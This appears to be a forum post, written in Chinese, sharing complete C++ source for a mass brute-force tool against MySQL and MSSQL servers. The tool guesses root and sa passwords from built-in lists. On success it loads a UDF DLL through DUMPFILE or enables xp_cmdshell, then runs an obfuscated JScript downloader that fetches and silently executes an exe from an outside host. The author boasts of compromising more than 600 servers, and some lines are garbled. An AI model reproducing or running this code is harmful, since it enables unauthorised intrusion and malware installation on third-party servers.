本工具可以同时进行进行mysql和mssql的弱口令扫描,并上传文件执行.
扫描成功获得弱口令账号密码后会自动根据版本信息保存扫描日志
mysql:
成功得到root密码后,新建表插入udf.dll二进制数据,并创建函数执行.
操作完成后,会删除使用的表和创建的函数
自动获取并根据mysql版本进行操作,mysql>5.1的自动获得plugin目录进行导出操作
不提供udf的源码(挺简单)
mssql:
成功得到sa密码后,尝试开启xp_cmdshell,执行命令
命令为jscript脚本.(比FTP方便)
操作执行完成后禁用xp_cmdshell
(没怎么用,所以功能简单)
每次猜解密码时会自动ping主机,如果大于设定超时时间跳过
端口扫描使用s扫描器
扫描通过读取程序目录的res.txt文件得到扫描的ip段
格式为
mysql和mssql一起扫:1 192.168.0.1 192.168.0.254[3306,1433]
单独扫一个:1 192.168.0.1 192.168.0.254[3306]
默认端口扫描线程为512 ,详见源码
默认并发密码猜解线程为100 (中间有Sleep 为低配置的机器考虑,详见源码)
mysql SDK 自行到mysql.com或者baidu,google下载
此代码在vs2008中编译成功,无任何错误.
由于配置错误或者编译器等等问题,本人一概不解释.
本人已利用此工具,得到600多台服务器,由于觉得无大用,所以早早停止了使用.
此代码写了很有些时日了,为vc初学者的练手题,所以代码中的错误,逻辑问题 牛哥们请自行修改
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <time.h>
#include <string>
#include <sql.h>
#include <sqlext.h>
#include "I:\\vs\\mysqlApi\\include\\mysql.h"
/*Code by s!lly3r Mail:silly3r@gmail.com*/
#pragma comment(lib,"I:\\vs\\mysqlApi\\lib\\libmysql.lib")
#pragma comment(lib,"Ws2_32.lib")
using namespace std;
#define XMYSQL 1
#define XMSSQL 2
#define MY_MSG WM_USER+100
#define EX_MSG WM_USER+101
BOOL IsPortOpen(char * address, int port);
DWORD WINAPI Thread1(LPVOID lpParameter);
DWORD WINAPI check(LPVOID lpParameter);
DWORD WINAPI Timer(LPVOID lpParameter);
struct data
{
char ip[16];
int type;
//HANDLE nhth;
};
//int state=0;
int ThreadMax=512;
int CrackMax=100;
char s_type[]="syn";
bool state=false;
long respos=0;
DWORD dw_ThreadId=NULL;
DWORD dw2_ThreadId=NULL;
int nMAX=0;
int nFlag=0;
bool Timeout=false;
bool scanner();
char *mypass[]={
"root",
"mysql",
"123456",
"pass",
"password",
"abc123",
"iloveyou",
"12345",
"1234",
"123",
"admin",
"12",
"1",
"11",
"111",
"1111",
"11111",
"111111",
""
};
char *mspass[]={
"",
"sa",
"pass",
"password",
"abc123",
"iloveyou",
"admin",
"1",
"12",
"123",
"1234",
"12345",
"123456",
"root",
"11",
"111",
"1111",
"11111",
"111111"
};
int _tmain()
{
FILE *f;
char buff[50];
srand((unsigned)time(NULL));
nFlag=GetTickCount()+rand()%999;
CreateThread(NULL,NULL,check,NULL,NULL,&dw_ThreadId);
int i=0;
while(true)
{
if(!scanner()){
printf("rror\n");
Sleep(1000);
return 0;
}
Sleep(1000);
if(fopen_s(&f,"Result.txt","r"))
{
printf("Error%d\n",GetLastError());
return 0;
}
while(true)
{
if(fgets(buff,50,f)==NULL)break;
if(strlen(buff)!=41)continue;
if(i<=CrackMax){
if(buff[1]==0x2E || buff[2]==0x2E || buff[3]==0x2E) /*0x2E '.'*/
{
char *ip=new char[16];
data *pdata=new data;
char *temp=new char[4];
memset(ip,0,sizeof(ip));
for(int j=0;j<=15;j++)
{
if(buff[j]==0x20)
{
ip[j]=0;
j=17;
for(int t=0;j<=21;j++)
{
if(buff[j]==0x20)break;
temp[t]=buff[j];
t++;
}
break;
}
ip[j]=buff[j];
}
memset(pdata->ip,0,sizeof(pdata->ip));
strcpy_s(pdata->ip,sizeof(pdata->ip),ip);
if(atoi(temp)==1433)
{
pdata->type=XMSSQL;
}else if(atoi(temp)==3306)
{
pdata->type=XMYSQL;
}else{
printf("result.txt error");
continue;
}
state=false;
CreateThread(NULL,NULL,&Thread1,(LPVOID)pdata,0,0);
i++;
Sleep(100);
while(true){
if(state)
{
delete[] pdata;
pdata=NULL;
delete[] ip;
ip=NULL;
delete[] temp;
temp=NULL;
break;
}
Sleep(1);
}
}else{
continue;
}
}else{
Sleep(2000);
Timeout=false;
CreateThread(NULL,NULL,Timer,NULL,NULL,&dw2_ThreadId);
while(true){
if(nMAX>=0.8*i || Timeout){
nFlag=GetTickCount()+rand()%999;
nMAX=0;
printf(".W");
PostThreadMessage(dw2_ThreadId,EX_MSG,0,0);
break;
}
Sleep(10);
}
i=0;
}
}
if(i>0)
{
Sleep(2000);
Timeout=false;
CreateThread(NULL,NULL,Timer,NULL,NULL,&dw2_ThreadId);
while(true){
if(nMAX>=0.8*i || Timeout){
nFlag=GetTickCount()+rand()%999;
nMAX=0;
printf(".W");
PostThreadMessage(dw2_ThreadId,EX_MSG,0,0);
break;
}
Sleep(10);
}
}
fclose(f);
Sleep(2000);
}
Sleep(1000);
return 0;
}
DWORD WINAPI Thread1(LPVOID lpParameter)
{
// state=1;
char *host=new char[16];
int type;
// HANDLE handle;
memset(host,0,sizeof(host));
type=((data*)lpParameter)->type;
strcpy_s(host,16,((data*)lpParameter)->ip);
state=true;
DWORD nTflag=nFlag;
if(type==XMYSQL)
{
if(!IsPortOpen(host,3306))
{
printf(".X");
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
printf(".M");
MYSQL *sock;
sock=mysql_init(0);
if(!sock)
{
printf("Mysql sock Init Error %s",mysql_error(sock));
}
for(int i=0;i<sizeof(mypass)/sizeof(char*);i++){
if(mysql_real_connect(sock,host,"root",mypass[i],"mysql",3306,NULL,NULL))
{
string ver=mysql_get_server_info(sock);
printf(".-m-");
if((static_cast<int>(ver.c_str()[0]) == 53 && static_cast<int>(ver.c_str()[2]) >= 49) ||
static_cast<int>(ver.c_str()[0]) > 53 )
{
MYSQL_RES *res;
MYSQL_ROW row=NULL;
char dir[MAX_PATH]={0};
char _dir[MAX_PATH]={0};
char Tmp[MAX_PATH]={0};
mysql_query(sock,"show variables like '%plugin%'");
res=mysql_use_result(sock);
if(mysql_num_fields(res)>=2)
{
row=mysql_fetch_row(res);
strcpy_s(Tmp,MAX_PATH,row[1]);
if(row[1][0]=='/')
{
mysql_close(sock);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
int num=0;
for(int ii=0;ii<=lstrlen(row[1]);ii++)
{
if(Tmp[ii]!='\\' && Tmp[ii]!='/')
dir[num]=row[1][ii];
else if(Tmp[ii]=='/'){
dir[num]='\\';
dir[num+1]='\\';
num+=2;
continue;
}else{
dir[num]='\\';
dir[num+1]='\\';
num++;
}
num++;
}
}else{
strcpy_s(dir,MAX_PATH,"c:\\\\windows");
}
mysql_free_result(res);
&nbs, p; mysql_query(sock,"DROP TABLE `silly3r_x`");
mysql_query(sock,"CREATE TABLE `silly3r_x` (`silly3r_at_gmail_dot_com` longblob NOT NULL)");
mysql_query(sock,"INSERT INTO `silly3r_x` VALUES (...)");
//此处为插入udf二进制的语句,建议新建一个h文件,把udf二进制数据定义为一个变量放进去
//udf换到vc6下编辑, 只是下载执行功能 ,体积可以控制在5k以内的
Sleep(500);
sprintf_s(_dir,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE '%s\\\\silly3r_x.so' FROM silly3r_x",dir);
mysql_query(sock,_dir);
Sleep(500);
mysql_query(sock,"CREATE FUNCTION silly3r_x RETURNS STRING SONAME 'silly3r_x.so'");
mysql_query(sock,"DROP TABLE `silly3r_x`");
ofstream mylog;
mylog.open("Mysql_5.1.txt",ios::app|ios::out|ios::_Noreplace);
mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version>5.0"<<endl;
mylog.close();
}else if((static_cast<int>(ver.c_str()[0]) <=53) && (ver.find("nt")<ver.length() || ver.find("NT")<ver.length()))
{
//mysql_query(sock,"use mysql");
mysql_query(sock,"DROP FUNCTION udown");
mysql_query(sock,"DROP TABLE `silly3r_x`");
mysql_query(sock,"CREATE TABLE `silly3r_x` (`silly3r_at_gmail_dot_com` longblob NOT NULL)");
mysql_query(sock,udf);
Sleep(500);
mysql_query(sock,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE 'c:\\\\windows\\\\silly3r_x.so' FROM silly3r_x");
Sleep(500);
mysql_query(sock,"SELECT silly3r_at_gmail_dot_com INTO DUMPFILE 'c:\\\\winnt\\\\silly3r_x.so' FROM silly3r_x");
Sleep(500);
mysql_query(sock,"CREATE FUNCTION silly3r RETURNS STRING SONAME 'silly3r_x.so';");
mysql_query(sock,"SELECT udown(\"http://www.T00ls.net/s!illy3r.exe\")");
Sleep(500);
mysql_query(sock,"DROP TABLE `silly3r_x`");
mysql_query(sock,"DROP FUNCTION udown");
ofstream mylog;
mylog.open("Mysql_5.0.txt",ios::app|ios::out|ios::_Noreplace);
mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version<5.0"<<endl;
mylog.close();
}else{
ofstream mylog;
mylog.open("Mysql_UNIX.txt",ios::app|ios::out|ios::_Noreplace);
mylog<<host<<"|"<<mypass[i]<<"|"<<ver.c_str()<<"|version<5.0"<<endl;
mylog.close();
}
mysql_close(sock);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}else{
if(mysql_errno(sock)==1045)
{
//printf(".m");
//PostThreadMessage(nThreadId,MY_MSG,0,0);
}else{
//PostThreadMessage(nThreadId,MY_MSG,0,0);
mysql_close(sock);
//CloseHandle(thandle);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}
}
}
mysql_close(sock);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
//CloseHandle(thandle);
return 1;
}else if(type==XMSSQL)
{
if(!IsPortOpen(host,1433))
{
printf(".X");
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
printf(".S");
SQLUINTEGER nTimeout=4;
SQLHANDLE henv,chandle,query; //SQL环境句柄
char szBuffer[128]= {0};
SWORD swStrLen;
SQLRETURN ret;
if(SQLAllocHandle(SQL_HANDLE_ENV,NULL,&henv)!=SQL_SUCCESS)
{
printf("SQLAllocHandle error");
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
if(SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER)!=SQL_SUCCESS)
{
printf("SQLSetEnvAttr error");
SQLFreeHandle(SQL_HANDLE_ENV,henv);
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
SQLAllocHandle(SQL_HANDLE_DBC,henv,&chandle);
//SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLGetConnectAttr(chandle, SQL_ATTR_CONNECTION_TIMEOUT, (SQLPOINTER)&nTimeout, SQL_IS_INTEGER, NULL);
SQLGetConnectAttr(chandle, SQL_ATTR_LOGIN_TIMEOUT, (SQLPOINTER)&nTimeout, SQL_IS_INTEGER, NULL);
for(int i=0; i<sizeof(mspass)/sizeof(char*);i++)
{
string str1="DRIVER={SQL Server};SERVER=";
str1+=host;
str1+=",1433;UID=sa;PWD=";
str1+=mspass[i];
str1+=";DATABASE=master";
printf(".s");
ret=SQLDriverConnect(chandle,NULL,(SQLCHAR *)str1.c_str(),str1.length(),
(SQLCHAR *)szBuffer,sizeof(szBuffer),&swStrLen, SQL_DRIVER_COMPLETE_REQUIRED);
if(ret==SQL_SUCCESS || ret==SQL_SUCCESS_WITH_INFO)
{
printf(".-s-");
ofstream mslog;
mslog.open("mssql.txt",ios::app|ios::out|ios::_Noreplace);
mslog<<host<<"|"<<mspass[i]<<endl;
mslog.close();
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC master..xp_cmdshell 'echo var u=\"http://www.T00ls.net/s!illy3r.exe\";try{var xav=\"DB.S\";var xav1=\"ipt.S\"+\"h\";var xml=new ActiveXObject(\"Microsoft.XMLHTTP\");xml.open(\"Get\",u,false);xml.send();var as=new ActiveXObject(\"A\"+/*123*/\"D\"+\"O\"+xav+\"tre\"+\"am\");as.Type=1;as.Open();as.write(xml.responseBody);as.SaveToFile(\"temp.exe\",2);as.Close();var w=new ActiveXObject(\"Ws\"+/*555*/\"c\"+\"r\"+xav1+\"ell\");w.run(\"temp.exe\",0);}catch(e){}>>cc.js'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC master..xp_cmdshell 'wscript.exe cc.js'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLAllocHandle(SQL_HANDLE_STMT,chandle,&query);
SQLExecDirect(query,(SQLCHAR*)"EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;",SQL_NTS);
SQLFreeHandle(SQL_HANDLE_STMT,query);
SQLDisconnect(chandle);
//delete[] &szBuffer;
SQLFreeHandle(SQL_HANDLE_ENV,henv);
SQLFreeHandle(SQL_HANDLE_DBC,chandle);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 0;
}
}
SQLDisconnect(chandle);
//delete[] &szBuffer;
SQLFreeHandle(SQL_HANDLE_ENV,henv);
SQLFreeHandle(SQL_HANDLE_DBC,chandle);
delete host;
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}else{
///....................
}
PostThreadMessage(dw_ThreadId,MY_MSG,nTflag,0);
return 1;
}
bool scanner()
{
DeleteFile("Result.txt");
FILE *res;
char buffer[60];
if(fopen_s(&res,"res.txt","r"))
{
printf("res.txt open error %d\n",GetLastError());
return 0;
}
fseek(res,respos,SEEK_SET);
if(fgets(buffer,60,res)==NULL)
{
printf("fgets res.txt error\n");
Sleep(3000);
return 0;
}
respos=ftell(res);
if(strlen(buffer)<25 || buffer[strlen(buffer)-2]!=0x5D)
{
if(buffer[strlen(buffer)-1]!=0x5D){
printf("res.txt error\n");
Sleep(3000);
return 0;
}
}
fclose(res);
char num[63]={0};
for(int i=0;i<=63;i++)
{
if(buffer[i]!=0x5B && buffer[i]!=0x5D)
{
num[i]=buffer[i];
}else if(buffer[i]==0x5B)
{
num[i]=0x20;
}else if(buffer[i]==0x5D)
{
num[i+1]=0x00;
//if(buffer[i+1]==0x5B)
//{
// num[i]=0x2C;
// //break;
//}else{
// break;
//}
}
}
STARTUPINFO si;
memset(&si,0x0,sizeof(si));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOW;
PROCESS_INFORMATION pi;
char *cmd=new char[80];
sprintf_s(cmd,80,"s.exe %s %s %d /save",s_type,num,ThreadMax);
printf("%s\n",cmd);
if(!CreateProcess(NULL,cmd,NULL,NULL,0,NULL,NULL,NULL,&si,&pi))
{
printf("s.exe start error...%d",GetLastError());
return 0;
}
WaitForSingleObject(pi.hProcess,INFINITE);
delete[] cmd;
cmd=NULL;
return true;
}
DWORD WINAPI check(LPVOID lpParameter)
{
MSG msg;
PeekMessage(&msg,0,WM_USER,WM_USER,PM_NOREMOVE);
//SetTimer(0,0,60000,NULL);
while(true)
{
if(GetMessage(&msg,0,0,0))
{
switch(msg.message)
{
case MY_MSG:
if(msg.wParam==nFlag)nMAX++;
break;
case EX_MSG:
//
break;
}
}
}
return 0;
}
DWORD WINAPI Timer(LPVOID lpParameter)
{
MSG msg;
PeekMessage(&msg,0,WM_USER,WM_USER,PM_NOREMOVE);
SetTimer(0,0,40000,NULL);
while(true)
{
if(GetMessage(&msg,0,0,0))
{
switch(msg.message)
{
case WM_TIMER:
Timeout=true;
return 0;
break;
case EX_MSG:
Timeout=false;
return 0;
break;
}
}
}
return 0;
}
BOOL IsPortOpen(char * address, int port)
{
int recv = 1;
WSADATA wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
BOOL Result = FALSE;
struct timeval timer4;
fd_set writefd;
ULONG value = 1;
recv = WSAStartup(MAKEWORD(1,1), &wsadata);
if(recv != 0)
{
printf("init failed %d.\n",WSAGetLastError());
return 0;
}
if ( LOBYTE( wsadata.wVersion ) != 1 ||
HIBYTE( wsadata.wVersion ) != 1 ) {
WSACleanup();
return 0;
}
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(fd < 0)
{
printf("[-] Create socket error %d. \n",WSAGetLastError());
return(0);
}
ioctlsocket(fd,FIONBIO,&value);
if (!(host1 = gethostbyname(address))){
printf("[-] Gethostbyname(%s) error %d.\n",address,WSAGetLastError());
return 0;
}
memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =AF_INET;
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);
timer4.tv_sec = 4;
timer4.tv_usec = 0;
FD_ZERO(&writefd);
FD_SET(fd,&writefd);
recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr));
if( FD_ISSET(fd, &writefd))
{
, recv = select(fd+1, NULL, &writefd, NULL, &timer4);
if( recv > 0 )
Result = TRUE;
}
closesocket(fd);
WSACleanup();
return Result;
}